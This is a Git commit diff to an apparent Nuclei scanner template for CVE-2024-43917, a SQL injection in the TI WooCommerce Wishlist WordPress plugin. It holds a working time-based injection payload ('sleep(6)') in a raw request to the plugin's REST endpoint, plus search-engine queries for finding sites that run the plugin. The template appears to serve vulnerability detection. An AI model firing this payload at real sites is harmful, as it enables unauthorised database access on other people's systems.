Update CVE-2024-43917.yaml

patch-12
Ritik Chaddha 2024-10-05 12:40:02 +04:00 committed by GitHub
parent 73caabe36d
commit 4ac4ddcd23
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 5 additions and 3 deletions

View File

@ -9,6 +9,7 @@ info:
reference:
- https://patchstack.com/articles/unpatched-sql-injection-vulnerability-in-ti-woocommerce-wishlist-plugin/
- https://patchstack.com/database/vulnerability/ti-woocommerce-wishlist/wordpress-ti-woocommerce-wishlist-plugin-2-8-2-sql-injection-vulnerability?_s_id=cve
- https://nvd.nist.gov/vuln/detail/CVE-2024-43917
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -25,7 +26,7 @@ info:
framework: wordpress
fofa-query: body="/wp-content/plugins/ti-woocommerce-wishlist/"
publicwww-query: "/wp-content/plugins/ti-woocommerce-wishlist/"
tags: cve,cve2024,wordpress,ti-woocommerce-wishlist,wp-plugin,sqli,intrusive
tags: cve,cve2024,wp,wordpress,ti-woocommerce-wishlist,wp-plugin,sqli
flow: http(1) && http(2) && http(3) && http(4)
@ -117,7 +118,8 @@ http:
- raw:
- |
GET /wp-json/wc/v3/wishlist/{{share_key}}/get_products?order=,(select*from(select(sleep(5)))a)--+- HTTP/1.1
@timeout: 20s
GET /wp-json/wc/v3/wishlist/{{share_key}}/get_products?order=,(select*from(select(sleep(6)))a)--+- HTTP/1.1
Host: {{Hostname}}
X-WP-Nonce: {{nonce}}
@ -125,7 +127,7 @@ http:
matchers:
- type: dsl
dsl:
- "duration>=5"
- "duration>=6"
- "contains(content_type, 'application/json')"
- "contains(body, 'product_id')"
condition: and